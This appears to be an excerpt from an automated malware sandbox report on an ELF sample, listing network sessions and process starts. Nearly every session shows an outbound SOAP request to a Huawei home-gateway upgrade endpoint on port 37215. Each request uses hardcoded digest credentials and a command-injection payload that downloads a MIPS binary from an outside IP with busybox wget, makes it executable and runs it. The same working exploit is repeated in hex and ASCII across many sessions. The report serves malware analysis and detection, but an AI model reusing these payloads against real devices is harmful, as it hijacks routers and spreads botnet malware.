                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          143192.168.2.233713241.240.1.2237215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.863925934 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          144192.168.2.2350508197.45.230.25337215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.864478111 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          145192.168.2.233393641.181.27.3037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.865024090 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          146192.168.2.2340604156.153.176.17537215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.865569115 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          147192.168.2.234539041.28.122.11337215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.866132021 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          148192.168.2.2334056156.79.85.12037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.882910013 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          149192.168.2.234653841.199.42.10937215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:50.883688927 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          System Behavior

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:/tmp/spc.elf
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                                          Start time (UTC):22:16:41
                                                          Start date (UTC):03/12/2024
                                                          Path:/tmp/spc.elf
                                                          Arguments:-
                                                          File size:4379400 bytes
                                                          MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e